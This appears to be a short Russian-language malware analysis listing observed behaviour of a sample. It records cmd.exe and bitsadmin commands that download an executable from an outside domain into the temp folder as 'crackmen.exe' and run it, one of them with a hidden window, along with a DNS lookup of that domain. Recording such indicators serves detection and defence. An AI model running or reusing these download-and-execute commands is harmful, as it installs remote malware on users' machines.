Техническая информация
- '<SYSTEM32>\cmd.exe' /c bitsadmin.exe /transfer /download "http://dryversdocumentsandfullburo.com/Officetmp465465.exe" "%tmp%/crackmen.exe" && "%tmp%/crackmen.exe"
- DNS ASK dr#########mentsandfullburo.com
- '<SYSTEM32>\cmd.exe' /c bitsadmin.exe /transfer /download "http://dryversdocumentsandfullburo.com/Officetmp465465.exe" "%tmp%/crackmen.exe" && "%tmp%/crackmen.exe"' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer /download "http://dryversdocumentsandfullburo.com/Officetmp465465.exe" "%LOCALAPPDATA%\Temp/crackmen.exe"